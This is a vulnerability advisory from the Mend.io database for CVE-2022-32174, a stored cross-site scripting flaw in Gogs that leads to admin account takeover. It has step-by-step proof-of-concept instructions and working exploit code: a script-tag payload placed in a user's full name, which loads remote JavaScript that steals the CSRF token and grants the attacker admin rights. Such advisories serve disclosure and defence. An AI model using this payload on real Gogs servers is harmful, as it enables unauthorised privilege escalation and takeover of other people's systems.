Mend.io Vulnerability Database

What is a CVE vulnerability ID? icon What is a WS vulnerability ID? icon What is an MSC vulnerability ID? icon
New vulnerability? Tell us about it!
icon

We found results for “

CVE-2022-32174

Date: October 11, 2022

Overview

In Gogs, versions v0.6.5 through v0.12.10 are vulnerable to Stored Cross-Site Scripting (XSS) that leads to an account takeover.

Details

Gogs is vulnerable to Stored Cross-Site Scripting that leads to an account takeover, in the select assignee component. When an admin selects an assignee from the user’s list, the malicious JavaScript payload in the first name executes that allows an attacker to gain admin privileges.

PoC Details

1. Login as user and navigate to your settings and change your full name to the XSS payload provided in the PoC 1 section below.
2. Now host the JavaScript file whose source code is provided in the PoC 2 section below.
3. Go to the admin’s repo and create an issue.
4. Login in as admin and navigate to the issue.
5. Under assignee, select the user with payload.
6. The malicious JavaScript will execute and allow the attacker to gain admin privileges in the application.

PoC Code

// PoC 1 - XSS Payload:
user1<script src=http://localhost:8181/xss.js>

// PoC 2 - Xss.js:
let a ="";
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/',true);
req.send();
function handleResponse() {
a=(document.documentElement.innerHTML).match(/_csrf" content=".{1,}"/)[0];
a=a.split("_csrf\" content=\"")[1];
a=a.split("\"")[0];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/admin/users/2', true);
changeReq.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
changeReq.send('_csrf='+a+'&login_type=0-0&login_name=&full_name=%3Cscript+src%3Dhttp%3A%2F%2Flocalhost%3A8181%2Fxss.js%3E%3C%2Fscript%3E&email=user1%40localhost.com&password=&website=&location=&max_repo_creation=-1&active=on&admin=on&allow_git_hook=on');

Affected Environments

Gogs versions v0.6.5 through v0.12.10

Prevention

No Fix

Language: Go

Good to know:

icon

Cross-Site Scripting (XSS)

CWE-79
icon

Upgrade Version

No fix version available

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): High
Integrity (I): High
Availability (A): High

Related Resources (6)

https://nvd.nist.gov/vuln/detail/CVE-2022-32174
https://www.mend.io/vulnerability-database/CVE-2022-32174
https://github.com/gogs/gogs
https://github.com/gogs/gogs/blob/v0.12.10/public/js/gogs.js#L263
https://github.com/advisories/GHSA-mcjj-2fvq-mc3r
https://www.mend.io/vulnerability-database/CVE-2022-32174